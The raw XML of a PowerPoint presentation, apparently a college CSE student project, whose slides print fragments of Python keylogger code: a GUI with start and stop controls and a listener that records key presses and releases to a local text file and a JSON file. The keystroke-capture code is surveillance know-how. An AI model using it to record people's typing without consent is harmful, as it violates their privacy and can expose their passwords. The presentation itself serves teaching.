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265" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="16140625" r:id="rId9"/>
    <p:sldId id="16140624" r:id="rId10"/>
    <p:sldId id="16140626" r:id="rId11"/>
    <p:sldId id="16140627" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="16140628"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techtrainer20/TNSD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JAJI ANJETHI K-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Dmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> College of Engineering-CSE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endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>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endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_button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p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip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p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904352" y="1692540"/>
            <a:ext cx="7487695" cy="752580"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720801" y="3458124"/>
            <a:ext cx="11250407" cy="15634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endParaRPr lang="en-US" b="1"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endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId1"/>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192" y="323232"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="62928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endParaRPr lang="en-US" sz="1800" b="1"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endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRP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endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>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rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2"/>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endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1"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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955279" cy="4667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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Initialize the variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        flag = True</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>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endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>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endParaRPr lang="en-IN" dirty="0"/>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endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>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5215</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>158</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Wingdings 2</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>__Inter_aaf875</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>ui-monospace</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Franklin Gothic Demi</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</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jajir</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-03T15:26:15Z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DE019375015D487F99FB8BF23438EE59</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>1033-11.2.0.11225</vt:lpwstr>
  </property>
</Properties>
</file>